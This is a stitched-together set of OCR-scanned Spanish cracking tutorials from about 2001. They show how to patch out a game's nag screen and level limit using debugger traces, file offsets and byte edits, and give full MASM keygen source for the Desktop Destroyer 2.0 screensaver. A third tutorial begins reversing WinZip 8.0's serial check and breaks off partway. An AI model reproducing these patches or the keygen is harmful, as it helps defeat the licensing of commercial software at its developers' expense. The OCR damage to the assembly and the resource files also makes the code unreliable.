AL ATAKE 


Primeramente vamos a observar su comportamiento, corremos la aplicacion y lo primero: un NAG 


Despues una ventana de dialogo, donde solicitan el nivel preferido, si indicamos un nivel entre O y 49 o 65536 y 65585 
todo va bien y a jugar 


Sin embargo, que pasa cuando damos un numero entre 50 y 65536 o mayor a 65585 ? 


Como respuesta tenemos frente a nosotros un aviso de la restriccion, y automaticamente te mandan a jugar al nivel 49 
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Bien, ahora sabemos donde actuar, cargamos la aplicacion en el 'Loader32' del Softlce 


Lo primero que vamos a hacer, es quitarnos de encima el molesto Nag-Screen, y para ello vamos a utilizar las 
siguientes interrupciones en el Softlce 


bpx MessageBox 

bpx MessageBoxExA 
bpx DialogBoxParam 
bpx DialogBox 


Corremos la aplicacion e inmediatamente saltamos al Softlce 


USER!DIALOGBOX 


17C7:4CB6 MOV CX, 4E1B < ---- Aqui estamos 
17C7:4CB9 JMP 4CBE 
17C7:4CBB 


vamos a detenernos aqui un poco para hacer varias observaciones, ya que el proposito de este texto es, en esencia un 
tutorial, asi que veamos la "Ventana de Registros' 


EAX=00000084 EBX=0000BFD6 ECX=8126B1BC EDX=81624B48 ESI=0000198E 
EDI=00000001 EBP=0000BFCE ESP=0000BFB8 EIP=00004CB6 odIszaPc 
CSs=17C7 DS=198F SS=198F ES=188F FS=0000 GS=0000 


observa bien estos dos valores SS=198F y ESP=0000BFB8 estos valores combinados nos indican donde esta la Pila, y 
si quieres verla, teclea en la "Ventana de Comandos' del Softlce 


D 198F:0000BFB8 presionas Enter y obtenemos 


198F:0000BFB8 5B 35 BF 3D CO 31 BF 3D-00 00 84 00 00 00 8E 19 
198F:0000BFC8 D8 C4 01 00 00 00 FA BF-02 11 07 3B D6 BF 40 2A 


ahora veamos que en 198F:0000BFB8 hay 5B 35 BF 3D o sea la direccion 3DBF:0000355B, al parecer a esa direccion 
vamos a caer, le damos a 'F12' y nos manda al Nag, ahora le damos a 'Play Game' y regresamos al Softlce, justo en la 
direccion que habiamos supuesto 


3DBF:3540 JMP 355B 
3DBF:3542 MOV SI, [OCAA] 
3DBF:3546 PUSH SI 


3DBF:3547 PUSH WORD PTR [BX+1E] 

3DBF:354A PUSH WORD PTR [BX+1C] 

3DBF:354D PUSH WORD PTR [BP-02] 

3DBF:3550 PUSH 40FF 

3DBF:3553 PUSH 31C0 

3DBF:3556 CALL USER!'DIALOGBOX 

3DBF:355B MOV DL AX < ---- Estamos aqui 
3DBF:355D PUSH WORD PTR [BP+06] 


podemos suponer que la instruccuion causante del NAG-Screen es 
3DBF:3556 CALL USER'DIALOGBOX 

por lo tanto, pongamos un JMP en la direccion 3DBF:3542 SI, [OCAA] para omitir tambien los PUSH 
3DBF:3542 JMP 355B 

en el W32Dasm nos vamos a :3542 SI, [OCAA] y vemos en la barra de estado el Offset 0003C82h, 

despues en el Hex WorkShop nos vamos al Offset y tecleamos EB 17, salvamos, corremos la aplicacion, y --- 

EXCELENTE funciono --- pero podemos ir mas alla, preguntemonos que sucederia si estando en la direccion 
3DBF:355B MOV DL AX 

presionamos 'F12' otra vez, ya que para aprender hay que experimentar, y regresamos a 


366F:10E7 RETF 0002 
366F:10EA ENTER 0024, 00 
366F:10EE PUSH 00 


366F:10FO LEA AX, [BP-24] 
366F:10F3 PUSH AX 
366F:10F4 CALL 340F:1B28 
366F:10F9 LEA AX, [BP-24] 


366F:10FC PUSH AX 
366F:10FD CALL 37FF:350E 


366F:1102 LEA AX, [BP-24] < ---- Aqui estamos 
366F:1105 PUSH AX 

366F:1106 CALL 37FF:33B2 

366F:110B LEAVE 


366F:110C RETF 


intentemos poner un JMP hacia la direccion 1102 en la direccion 366F:10F9 

366F:10F9 JMP 1102 
pero ... NO, no ganamos nada haciendo esto, intentemos mejor eliminar por completo las tres subrutinas y probemos la 
aplicacion, por si se queda congelada o nos manda algun error (en tal mejor modificariamos 3DBF:3542 SI, [OCAA] 
por 3DBF:3542 JMP 3553B y nos dejamos de tonterias),  366F:10EE JMP 110B 
en el W32Dasm nos vamos hasta :10EE PUSH 00 y vemos en la barra de estado el Offset 0001492Eh, en el Hex 
WorkShop nos vamos al Offset y tecleamos EB 1B, salvamos, corremos la aplicacion, y ... 

... funciono tambien 


No hay que ser tan ambiciosos, pero, sino lo intentamos nunca sabremos que tipo de errores se pueden generar, asi que 
estando en la direccion 

366F:1102 LEA AX,[BP-24] 
presionamos 'F12" otra vez, ya que somos necios, y regresamos al Softice 


3C77:27D0 JMP 2873 

3C77:27D3 PUSH DS 

3C77:274D PUSH 01A6 

3C77:277D CALL GDI!CREATEPALETTE 

3C77:27DC PUSH AX 

3C77:27DD PUSH 25F8 

3C77:27E0 CALL 3BCF:DB72 

3C77:27E5 CALL 366F:10EA 

3C77:27EA CMP WORD PTR [3056], 01 < ---- Aqui estamos 
3C77:27EF JNZ 2803 


intentemos ahora poner un JMP hacia la direccion 27EA en la direccion 3C77:27D3 
3C77:27D3 JMP 27EA 
y aunque parece criminal, esta aplicacion funciona 


Bueno, nuestra intencion inicial era desaparecer el NAG-Screen y es suficiente para ello, con llevar a cabo el paso 
anterior, no vaya a ser que en realidad estemos eliminando una rutina importante, que a simple vista no resalta. Punto y 
aparte 


Una vez concluido el primer paso, vamos a lo realmente interesante, miles de niveles nos estan esperando, y no va a ser 
facil cazarlos, para ello primero vamos a quitar el texto siguiente (Puzzles 65536 though 131071 have no " given" 
locations on the playing board.) ya que confiamos que no va a ser necesario, en el Offset 0004047E y hasta el 
000404CB sustituimos por espacios ( 20h en el Hex WorkShop) o por la leyenda que se te ocurra poner "Alguna vez, 
has bailado con el Diablo, bajo tenue luz de la Luna?. Fantomas" 


Ahora si, corremos la aplicacion una vez cargada en el Loader32 (recordemos que aun tenemos nuestras interrupciones 
cargadas, te sugiero que las inhabilites ( en el Softice con 'BD *' ) para llegar rapidamente al cuadro de dialogo ( ver 
imagen2 ), 


(00) * bpx MessageBox 
(01) * bpx Message BoxExA 
(02) * bpx DialogBoxParam 
(03) * bpx DialogBox 


una vez que lleguemos, vamos habilitar nuestras interrupciones ( en el Softice con 'BE *' ) y vamos a tratar de generar 
un error en la aplicacion, solicitando el Puzzle ++ 50, para que nos mande el cuadro de dialogo ( ver imagen 3 ) 


seleccionamos 'OK' y regresamos al Softice 


USER!DIALOGBOX 


17C7:4CB6 MOV CX, 4E1B < ---- Aqui estamos 
17C7:4CB9 JMP 4CBE 
17C7:4CBB 


aqui empieza a preparar el cuadro de dialogo que nos va a mostrar, por lo tanto apretamos 'F12' para que nos mande a la 
instruccion que la ordeno 


3D3F:3540 JMP 355B 

3D3F:3542 MOV SI, [OCAA] 
3D3F:3546 PUSH SI 

3D3F:3547 PUSH WORD PTR [BX+1E] 
3D3F:354A PUSH WORD PTR [BX+1C] 
3D3F:354D PUSH WORD PTR [BX-02] 
3D3F:3550 PUSH 3D3F 

3D3F:3553 PUSH 31C0 

3D3F:3556 CALL USER!'DIALOGBOX 
3D3F:355B MOV DL AX < ---- Aqui estamos 
3D3F:355D PUSH WORD PTR [BP+06] 


podriamos actuar precipitadamente y sustituir rapidamente 

3D3F:3542 MOV SI, [OCAA] por 3D3F:3542 JMP 355B 
pero esto unicamente nos evitaria ver el mensage de restriccion, y de todas maneras no nos permitiria pasar del nivel 
49, asi que tenemos que encontrar donde se lleva a cabo esta restriccion, para ello apretamos 'F12' y nos manda a 


325F:068A CALL 325F:241C 
325F:068F MOV BX, [3064] 
325F:0693 MOV AX, [BX,+12] 
325F:0696 MOV [305A], AX 


325F:0699 MOV AX, [BP-40] 
325F:069C MOV [300A], AX 


325F:069F MOV [BX+0C], AX 
325F:06A2 CMP WORD PTR [3004], 31 
325F:06A7 JBE 06D3 

325F:06A9 PUSH 00 

325F:06AB LEA AX, [BP-30] 


325F:06AE PUSH AX 
325F:06AF CALL 429F:2604 


325F:06B4 LEA AX, [BP-30] 

325F:06B7 PUSH AX 

325F:06B8 CALL 3D3F:350E 

325F:06BD MOV AX, 0031 < ---- Aqui estamos 
325F:06C0 MOV [300A], AX 

325F:06C3 MOV BX, [3064] 

325F:06C7 


ahora si, aqui podemos ver la rutina de restriccion, en la direccion 

325F:06A2 CMP WORD PTR [300A], 31 
compara nuestro numero elegido 32h ( 50 decimal ) y sis es mayor a 31h, no salta a 325F:06D3, nos manda el mensaje, 
y sustituye nuestra seleccion por 31h ( 49 en decimal ) y ya perdimos, asi entonces si queremos ganar basta con 
cambiar 325F:06A7 JBE 06D3 por 325F:06A7 JMP 06D3, nuevamente con el W32Dasm obtenemos el Offset 
00013EE7h, y en el Hex WorkShop nos vamos al Offset y tecleamos EB 2A, salvamos, corremos la aplicacion, y ... 
Asunto arreglado 


*La amenaza elegante* 


El presente documento, es una tarea cientifica de investigacion, con caracter docente, no pretende violar ninguna ley 
vigente, el autor no se hace responsable del uso, manejo o practicas inadecuadas del analisis presentado (:0) 


Programa: 


Karpoff Spanish Tutor 
Desktop Destroyer 2.0 


PROTECCION: Name / Serial. 

Objetivo: Hacer un Keygen. 

Descripcion: Salvapantallas que Juega con la imagen del escritorio. 

Dificultad: Aficionado. 

DOWNLOAD: http://www.janz-kiel.de/isotope244/DesktopDestroyer.zip 

Herramientas: Softice, Masm. 

CRACKER: CaoS ReptantE FECHA: 21/07/2001 
INTRODUCCION 


A la hora de proteger un programa mediante un serial number dependiente del nombre o también de la 
dirección de e-mail -cómo en este programa-, hay varias maneras de comprobar que el número que 
introducimos es correcto. La más sencilla es la de comparar el número introducido con un número 
generado por el programa a partir del nombre. En este caso, basta con buscar mediante la instrucción s 
30:00 1 f£ffffff 'serial_chungo' la posición o posiciones que ocupa en la memoria el número introducido. A 
continuación, empleando las instrucciones bpm dirección_obtenida r o bpr inicio_dirección_obtenida 
final_dirección obtenida r sabremos cuando el programa lee este número para compararlo con el 
correcto. Hay otro tipo de comparación -que sólo he visto una vez- en la que el programa comparaba tres 
caracteres generados a partir del serial chungo, con las tres primeras letras del nombre. No tiene mayor 
dificultad que el anterior si aceptamos que el nombre con el que nos registramos empiece por ejemplo por 
"H+9" o algo parecido. De lo contrario tendremos que investigar como se generan estos caracteres para 
introducir un número que haga que coincidan con el inicio de nuestro nombre. Hay otro sistema mixto, que 
convierte el nombre en un número y el serial chungo en otro número, comparando después ambos 
números. Este sistema, lógicamente es más complicado que los anteriores, sobre todo a la hora de hacer un 
keygen. De todos modos, estos tres sistemas tienen una característica común: el éxito o el fracaso se 
deciden en una sola comparación, lo que facilita sobre todo el parcheado del programa. Hay otra 
posibilidad, que desde mi punto de vista es la mejor, y que consiste en establecer una serie de "pruebas" 
que el número debe pasar para ser aceptado, con todas las posibles variantes que se le puedan ocurrir al 
programador. Esto obliga a seguir todo el proceso y dificulta también el parcheado. En este caso, la pereza, 
la desidia, el bajo precio del programa o el fatalismo "si igual lo van a crackear..." han hecho elegir la 
solución más sencilla. Esto ha sido una suerte a la hora de hacer el keygen, porque el proceso de 


generación del número correcto se repite y se embarulla para tratar de enmascararlo, por lo que resulta más 
sencillo trabajar hacia atrás, es decir empezar por la comparación e ir desandando el camino hasta descubrir 
el proceso. Vamos a verlo. 


AL ATAKE 


En primer lugar, después de haber cargado el Softlce, haber introducido unos datos cualesquiera, y establecido el 
breakpoint de siempre :0) bpx hmemcpy, tratamos de registrar el programa. Salta el Slce y después de darle dos 
veces a FS y 9 veces a F12 para volver al programa, aparecemos en: 


:00405DBE 8D4C242C lea ecx, dword ptr [esp+2C] 


Ahora buscaremos la situación del serial chungo siguiendo el procedimiento descrito anteriormente. Podemos ver 
que el número se sitúa en dos posiciones de memoria, aunque sólo nos interesa la primera. Si ahora utilizamos la 
instrucción bpm, el Slce nos avisará cuando se lea la primera cifra del número, lo que normalmente es suficiente 
para saber por donde va la cosa, pero en este caso tendremos que emplear la instrucción bpr, que nos indicará la 
lectura de cualquiera de las cifras que forman el número (ya veremos por qué...). FS para continuar y llegamos a: 


:00408C00 F2 repnz 

:00408C01 AE scasb 

:00408C02 F7D1 not ecx 

:00408C04 49 dec ecx 

:00408C05 83F912 cmp ecx, 00000012 


Aquí se compara la longitud de nuestro serial con 12h, y nos manda a paseo si no es igual. Así pues, nuestro número 
deberá tener 18 cifras. FS de nuevo y aparecemos en: 


:004098F1 8A46FF mov al, byte ptr [esi-01] 
:004098F4 33C9 xXOr ecx, ecx 
:004098F6 3A47FF cmp al, byte ptr [edi-01] 


Aquí se efectúa la comparación entre nuestro serial chungo situado en ESI con el número válido que aparece en EDI, 
pero ¡oh sorpresa! se empieza a comparar por la novena cifra. 


:004098F9 7704 ja 004098FF 
:004098FB 7404 je 00409901 


Si las cifras de ambos números coinciden, salta y continua la comprobación. En caso contrario nos echará a los 
marrajos :o0( Así se hace la comparación entre las ocho cifras que van de la novena a la decimosexta, las otras no he 
averiguado como se generan pero no tienen ninguna trascendencia. A partir de aquí, empieza la marcha atrás. En mi 
caso, el trozo de número correcto está situado entre las posiciones 68F4ED y 68F4F4. Vamos a pillar al programa 
cuando escribe el número, mediante bpr 68f4ed 68£4f4 w. Eliminamos o desactivamos mediante be o bd, cualquier 
otro breakpoint que tengamos, introducimos la instrucción d 68f4ed para vigilar que es lo que se escribe en esa 
posición y volvemos a empezar desde el principio el proceso, pulsando la tecla de registro, y vemos que en: 


:0040BC44 8802 mov byte ptr [edx], al 


se escriben "X" en las posiciones que más adelante van a ser ocupadas por las cifras del número. Continuamos con 
FS: 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :00408BBF (C) 


:00408BA7 33C0 xor eax, eax 

:00408BA9 BFOA000000 mov edi, 0000000A 

:00408BAE 8A0429 mov al, byte ptr [ecx+ebp] 
:00408BB1 99 cda 

:00408BB2 F7FF idiv edi 

:00408BB4 80C230 add dl, 30 

:00408BB7 88540E09 mov byte ptr [esit+ecx+09], dl 


Llegamos a este punto. Vemos que el contenido de ECX+EBP se divide por 10 (en EDI) y que al resto (en EDX) se 
le suma 48 (30h) para convertirlo en el código ASCII del número obtenido. 


:00408BBB 41 inc ecx 
:00408BBC 83F908 cmp ecx, 00000008 
:00408BBF 72E6 jb 00408BA7 


Se repite el bucle ocho veces para obtener las ocho cifras importantes del serial. Nueva marcha atrás. Para ver 
cuando se escribe en la posición ECX+EBP (en mi caso: 810E70) introduciremos la instrucción bpr 810E70 
S$10E77 w y volveremos a empezar el proceso. Vigilamos como hemos hecho antes lo que sucede en esa dirección y 
al detenerse el Softlce en: 


:00408A43 F3 repz 


vemos que se escriben ceros sobre esas posiciones de memoria. Continuamos con FS y vemos que a partir de: 


:00408A62 F3 repz 

:00408A63 A5 movsd 

:00408A64 8BC8 mov ecx, eax 
:00408A66 33C0 xor eax, eax 
:00408A68 83E103 and ecx, 00000003 
:00408A6B F3 repz 


empieza a escribir la cadena "Desktop Destroyer" y justo a continuación, nuestro nombre (en este caso: CaoS 
ReptantE) y nuestra dirección de e-mail (en este caso: caos_reptante hotmail.com). FS nuevamente: 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :00408AD9 (C) 


:00408ACA 8A48FF mov cl, byte ptr [eax-01] 
:00408ACD 8A10 mov dl, byte ptr [eax] 
:00408ACF 02D1 add dl, cl 

:00408AD1 8810 mov byte ptr [eax], dl 


Llegamos aquí y miramos lo que está haciendo el programa. 


:00408AD3 40 inc eax 

:00408AD4 8D1407 lea edx, dword ptr [edit+eax] 
:00408AD7 3BD6 cmp edx, esi 

:00408AD9 72EF jb 00408ACA 


Y casi a continuación: 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :00408AEF (C) 


:00408AE2 8A442B01 mov al, byte ptr [ebx+ebp+01] 
:00408AE6 8A0C2B mov cl, byte ptr [ebx+ebp] 
:00408AE9 02C8 add cl, al 

:00408AEB 880C2B mov byte ptr [ebx+ebpl, cl 
:00408AEE 4B dec ebx 

:00408AEF 75F1 jne 00408AE2 


Suma el código ASCU de la "D" (44h) y lo suma con el de la "e" (65h) y el resultado (A9h) lo pone donde estaba la 
"e". A continuación, suma A9 con el código de la "s" (73h) y el resultado (sería 11C pero en DL sólo cabe 1C) lo 
pone donde estaba la "s". Y así hasta que se acaba la cadena de texto formada por "Desktop Destroyer" + nuestro 
nombre + la dirección de e-mail. Posteriormente, este proceso se repite, pero a la inversa, es decir que empieza por el 
último número y termina en el primero (en este caso: A9h, al 44h no llega) Así pues, con los datos que hemos 


puesto, los ocho primeros números después del primer pase son: 
44 A9 1C 87 FB 6A DA FA 


Y después del segundo: 

44 EE 45 29 A2 A7 3D 63 

Tened en cuenta que se suman DL y CL, y luego CL y AL, lo que significa que si la suma es mayor de dos cifras, la 
de mayor significación, se pierde. 


Ahora, después de obtener los números que como hemos visto más arriba se situaban en ECX+EBP, viene lo de 
dividir por Ah y sumarle 30h al resto para obtener el código ASCII. El resultado es: 88912719, por lo que el serial 
correcto será: xxxxxxxx88912719x, siendo x un número cualquiera del 0 al 9. 


Una vez descubierto "el pastel", vamos a programar el keygen con la inestimable ayuda del Masm. Para empezar, ahí 
va el fichero de recursos rsrc.rc: 


finclude "Amasm32Xincludelresource.h" 


tdefine IDD_DIALOG 1000 
tdefine IDC_NAME 1001 
tdefine IDC_MAIL 1002 
tdefine IDC_SERIAL 1003 
tdefine IDC_GEN 1004 
tdefine IDC_EXIT 1005 
define IDC_STATIC =1 


keygen ICON keygen.ico 


IDD_DIALOG DIALOG 100,100,115,65 


STYLE WS_CAPTION | DS_CENTER | WS_SYSMENU |WS_MINIMIZEBOX 


CAPTION "Desktop Destroyer 2.0" 


FONT 10, "MS Sans Serif" 


BEGIN 
TEX "Nombre", IDC_STATIC,8,8,28,10 
¿TEX "E-mail", IDC_STATIC,8,22,28,10 
LTEX "Serial", IDC_STATIC,8,36,28,10 
EDI EX IDC_NAME,36,6,71,10,ES_AUTOHSCROLL | ES_CENTER 
EDITTEX IDC_MAIL,36,20,71,10,ES_AUTOHSCROLL | ES_CENTER 
EDI EX IDC_SERIAL,36,34,71,10,ES_READONLY | ES_ CENTER 
PUSHBUTTON "Generar", IDC_GEN, 8,49,40,12 
PUSHBUTTON "Terminar", IDC_EXIT,67,49,40,12 

END 


Hemos definido la ventana, los recuadros de texto, los botones, el icono, etc. En anteriores trabajos, he explicado los 
fundamentos del programa con más detalle o he indicado donde obtener información de primera mano sobre este 
tema. Si necesitáis alguna aclaración, dadme un toque :0) Ahora vamos a ver el fichero ddestroyer.asm del que 


sólo comentaré los aspectos propios de este programa concreto. 


.386 
.model flat,stdcall 
option casemap:none 


include c:imasm32Xincludewindows.inc 
include c:imasm32Xincludeluser32.inc 
include c:imasm32Xincludelkernel32.inc 
includelib c:imasm321libluser32.1lib 
includelib c:imasm3211liblkernel32.lib 


¿const 

IDD_DIALOG EQU 1000 
IDC_NAME EQU 1001 
IDC_MATL EQU 1002 


IDC_SERIAL EQU 1003 
IDC_GEN EQU 1004 
IDC_EXIT EQU 1005 


DlgFunc PROTO : DWORD, :DWORD, :DWORD, : DWORD 


Operacion PROTO 


. data 

nombre db 64 dup(0),0 

mail db 32 dup(0),0 

cadena db 110 dup(0),0 

serial db "190072001xxxxxxxx0",0 


Las cifras que he puesto aquí no tienen ningún valor, las "x" se substituirán por las cifras que generaremos. 


Icono db "keygen",0 

Iconimage db "keygen",0 

texto db "Desktop Destroyer",0 
minombre db "CaoS ReptantE",0 

mimail db "caos_reptanteflhotmail.com",0 
hInstance dd 0 

hIcon da 0 

hWnd dd 0 

.code 

start: 


invoke GetModuleHandle,NULL 

mov hInstance,eax 

invoke DialogBoxParam,hInstance, IDD_DIALOG, NULL, addr DlgFunc, NULL 
invoke ExitProcess, NULL 


DlgFunc proc hD1g:DWORD, uUMsg:DWORD, wParam:DWORD, 1lParam: DWORD 


.1f uMsg==WM_INITDIALOG 
mov eax,hDlg 
mov hWnd, eax 
invoke LoadIcon,hInstance,addr Icono 
mov hlIcon,eax 
invoke SendMessage, hDlg, WM_SETICON,1,hIcon 
invoke SetDlglItemText,hDlg,IDC_NAME,ADDR minombre 
invoke SetDlglItemText,hDlg,IDC_MATL,ADDR mimail 
.elseif uMsg==WM_CLOSE 
invoke EndDialog,hDlg,NULL 
.elseif uMsg==WM_COMMAND 
mov eax,wParam 
mov edx,eax 
shr edx,16 
.1f dx==BN_CLICKED 
.«1f ax==IDC_EXIT 
invoke SendMessage,hDlg,WM_CLOSE, 0,0 
.elseif ax==IDC_GEN 
invoke GetDlglItemText,hDlg,IDC_NAME,ADDR nombre, 64 
invoke GetDlglItemText,hDlg,IDC_MATL,ADDR mail, 32 
invoke l1lstrlen,ADDR nombre 
invoke Operacion 
invoke SetDlgltemText,hDlg,IDC_SERIAL,ADDR serial 
ret 
.endif 
.endif 
.endif 
Pet 


Hemos creado la ventana y controlamos en primer lugar si el programa se cierra desde la parte superior derecha, o si 
se pulsa un botón. En este caso si el botón es el de salir, pues adiós... y si es el de generar el serial, vamos a 
operacion, y al regreso, colocamos el serial obtenido en la ventana correspondiente. 


DlgFunc endp 


Operacion proc 
pushad 


Por si acaso... 


xXOr eax, eax 
mov ebx, offset cadena 
mov ecx, offset texto 


buclel: mov al, byte ptr [ecx] 

«if al == 0 
jmp seguirl 

.endif 
mov byte ptr [ebx], al 
inc ebx 
inc ecx 
jmp buclel 


El bucle 1 escribe en el espacio reservado a la variable cadena, el texto "Desktop Destroyer". 


seguir1l: mov ecx, offset nombre 
bucle2: mov al, byte ptr [ecx] 
.1f al == 
jmp seguir2 
.endif 
mov byte ptr [ebx], al 
inc ebx 
inc ecx 
jmp bucle2 


El bucle 2 escribe a continuación del texto anterior, nuestro nombre. 


seguir2: mov ecx, offset mail 


bucle3: mov al, byte ptr [ecx] 
mov byte ptr [ebx], al 
.1f al == 

jmp seguir3 

.endif 
inc ebx 
inc ecx 
jmp bucle3 


El bucle 3 escribe a continuación, nuestra dirección de e-mail. Fijaos que la comprobación de que el caracter es cero 
se hace despues de haberlo escrito, a diferencia de los bucles anteriores. Esto es para que la cadena "suma" termine 
en cero. 


seguir3: mov ebx, offset cadena 
mov edi, ebx 


buclel4: mov al, byte ptr [ebx] 
inc ebx 
mov cl, byte ptr [ebx] 
.1f cl == 0 
dec ebx 
jmp bucles 
.endif 
add al, cl 


mov byte ptr [ebx], al 


jmp bucle4 


El bucle 4 suma el código ASCI de la primera letra de la cadena con el de la segunda como hemos visto 
anteriormente, continuando el proceso hasta el final de la cadena de texto. 


bucle5: mov al, byte ptr [ebx] 
dec ebx 
mov cl, byte ptr [ebx] 
push ebx 
sub ebx, edi 
.1f ebx == 
pop ebx 
jmp seguir 
.endif 
pop ebx 
add al, cl 
mov byte ptr [ebx], al 
jmp bucles 


El bucle 5 hace lo mismo, pero desde el final al principio. Por cierto, no llega a modificar el primer numero que es el 
44h correspondiente a la "D", por lo que, como veremos, la primera cifra útil es siempre un ocho. 


seguir: mov ebx, offset cadena 
mov ebp, offset serial 
add ebp, 9 


Suma nueve para empezar por la novena cifra. 


mov ecx, 10 
mov edi, ebx 
bucle6: xor edx, edx 
mov al, byte ptr [ebx]l 
div ecx 
add dl, 48 
mov byte ptr [ebp], dl 
inc ebx 
inc ebp 
sbb ebx, edi 
.1f ebx== 
jmp final 
.endif 
add ebx, edi 
jmp bucle6 


El bucle 6 se repite ocho veces y divide los primeros números de la variable cadena (en EAX) por 10 (ECX) y le 
suma al resto (en EDX) 48 para convertirlo en el código ASCII del número, tal como hemos visto anteriormente que 
hacía el programa "víctima". Finalmente coloca el número resultante en el lugar que le corresponde en la variable 


serial. 


final: popad 
Let. 


Operacion endp 


end start 


Y eso es to... y eso es to... y eso es todo amigos. 


le 3 Desktop Destroyer 2.0 A E | 


Nombre | CaoS ReptantE 
E-mail Ícaos_reptante(3hotm 
Serial | 190072001889127190 


Terminar | 


Bueno, hemos llegado al final, ahora ya me puedo ir de vacaciones, pero no sin dejaros deberes para que los hagáis 
durante mi ausencia :0) En la misma página que hay este salvapantallas, hay otro mucho mejor (Liquid Desktop) con 
un sistema de protección similar, podéis practicar con él y, si lo hacéis, veréis que merece la pena registraros 
legalmente :0) En cualquier caso, si no queréis despertaros por la noche oyendo los gritos de los hijos de los 
programadores, pagad por los programas que utilicéis ;0) 


Ya sólo me queda saludar a todos los code crackers en general, y especialmente a Act MagO, DeK_Oin y el 
Pr*fEsOr X. También muy cordialmente a Karpoff. 


Si queréis aclaraciones sobre mis tutos, dadme un toque, mi dirección de e-mail es: caos_reptante O hotmail.com 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Karpoff Spanish Tutor 2001 


¡Programa : 


| Winzip 8.0 


PROTECCION: 


Name/Serial. 


Descripcion: Clásico compresor/descompresor de archivos. 
Dificultad: Novato. 


DOWNLOAD : 


http://www.winzip.com 


Herramientas: SoftIce, W32Dasm, Editor Hexadecimal. 


CRACKER : CKENER FECHA: 21/04/2001 


INTRODUCCION 


Hey !! Hola a todos, este ha sido el primer programa que crackeo, en realidad es muy sencillo y por ello 
vamos a hacer un ejercicio extra... ya verán de que se trata. Bueno creo que esta demás hablar sobre este 


clásico compresor/descompresor de archivos para Windows, así que empecemos... 


AL ATAKE 


Previamente con el Winzip instalado, veamos que nos encontramos por ahí. Nos aparece una nag que nos dice que estamos 
utilizando una versión no registrada del programa y por lo tanto solo podemos usarla durante 21 días, después de ello debemos 
pagar la pequeña cantidad de $29 dólares (como si nos lloviera dinero) para obtener nuestro + de registro... sí claro! 

Vemos que podemos registrarnos desde ese nag o bien desde el menú Help...Enter Registration Code... , vemos también que en la 
barra de titulo nos aparece un desagradable letrero como este: WinZip (Unregistered). Y eso no es todo, cuando creamos los self- 
extract se molestan en decir que fue hecho con una versión no registrada. Valla que tenemos razones para jugar un rato. 


Vallamos a cualquiera de las ventanas para registrarnos e introduzcamos un nombre: CKENER y un codigo falso: 787878, 
hacemos click en OK y... SORPRISE !!! nos aparece un mensaje que dice: Incomplete or incorrect information. 
Desensamblemos el ejecutable con W32Dasm y busquemos a través de las String References: 


String Resource ID=00652: 
String Resource ID=00653: 
String Resource ID=00654: 
String Resource ID=00655: 
String Resource ID=00656: 


"Could not find %:s" 

"WinZip Add-Ons cannot be removed while WinZip is running. Cl" 
"Incomplete or incorrect information" 

"For full access to WinZip's shell interface, WinZip must be " 
"However, a different copy of WinZip in a different folder or" 


Con un doble click nos manda a un lugar como este: 


* Referenced by a (U)nconditional or (C)onditional Jump at Addresses: 
|:00407FAA(O), :00407FB3(C), :00407FBC(C) 


| 
:00408005 E89C020000 call 004082A6 


* Possible Reference to String Resource ID=00654: "Incomplete or incorrect information" 


:0040800A 688E020000 push 0000028E 

:0040800F EsD9750300 call 0043FS5ED 

:00408014 50 push eax 

:00408015 53 push ebx 

:00408016 6A3D push 0000003D 

:00408018 E808800200 call 00430025 

:0040801D 83C410 add esp, 00000010 

:00408020 FF05F87A4800 inc dword ptr [00487AF8] 


Vemos en la parte superior que nos han mandado hasta aquí desde tres lugares diferentes: OO4O7FAA, 00407FB3, 00407FBC, y 
también que los saltos están muy próximos entre sí. Vallamos con Goto Code Location hasta la primera dirección de ellas y allí 


encontraremos los tres saltos. 


Reference To: USER32.GetDlgltemTextA, Ord:0104h 


| 
:00407F8F FF1528744700 Call dword ptr [00477428] 


:00407FE95 56 push esi 
:00407F96 EsFE780300 call 0043F89A 
:00407F9B 56 push esi 
:00407F9C E822790300 call 0043F8C3 


:00407FA1 803D78CD480000 cmp byte ptr [0048CD78], 00 


:00407FAS8 59 pop ecx 
:00407FA9 59 pop ecx 
:00407FAA 7459 je 00408005 


:00407FAC 803DA4CD480000 cmp byte ptr [0048CDA4], 00 


:00407FB3 7450 je 00408005 
:00407FB5 ES1BFAFFFF call 004079D5 
:00407FBA 85CO0 test eax, eax 
:00407FBC 7447 je 00408005 
:00407FBE 57 push edi 


Observemos que los tres je nos mandan a la dirección 004080053 (directo al mensaje de error) y evitan que lleguemos a la zona de 


victoria. 


Reiniciemos la maquina (si es que no tenemos cargado el Soft-Ice), abrimos el Winzip y volvemos a llenar el cuadro de 
registracion con los datos antes mencionados, antes de darle OK, presionemos Ctrl+D para poner un BPX HMEMCPY (para que el 
Soft-Ice salte cuando lea nuestros datos), FS para salir de Soft-Ice y damos OK .... BOOOM .... de nuevo en Soft-Ice, presionemos 
F12, F12, F12.... hasta llegar al código de Winzip (ver línea verde abajo). Y vemos algo parecido a esto: 


:00407F6D FF1528744700 Call dword ptr [00477428] < 


:00407F73 57 push edi<------- Aparecemos Aqui 
:00407F74 E821790300 call 0043F89A 
:00407F79 57 push edi 

:00407F7A Es44790300 call 0043F8C3 
:00407F7F 59 pop ecx 

:00407F80 BEA4CD4800 mov esi, 0048CDA4 
:00407F85 59 pop ecx 

:00407F86 6AO0B push 0000000B 

:00407F88 56 push esi 

:00407F89 68810C0000 push 00000C81 
:00407F8E 53 push ebx 


:00407F8F FF1528744700 Call dword ptr [00477428]<- 


:00407F95 56 push esi 
:00407F96 EsFF780300 call 0043F89A 
:00407F9B 56 push esi 


o Recoge nuestro nombre 


aan Recoge Codigo Falso 


:00407F9C E822790300 call 0043F8C3 

:00407FA1 803D78CD480000 cmp byte ptr [0048CD78], 00 <------- Chega que hallamos escrito algo en el nombre, de lo contrario 
vamos a error. 

:00407FAS 59 pop ecx 

:00407FA9 59 pop ecx 

:00407FAA 7459 je 00408005 <------- Brinca a error 

:00407FAC 803DA4CD480000 cmp byte ptr [0048CDA4], 00 <------- Cheqa que hallamos escrito la clave, de lo contrario vamos a 
error. 

:00407FB3 7450 je 00408005 <------- Brinca a error 

:00407FB5 ES1BFAFFFF call 004079D5 <------- Dentro de este Call se genera y se compara el código real con nuestro 787878, si 
no son iguales eax sale con O, de lo contrario eax sale con 1. 

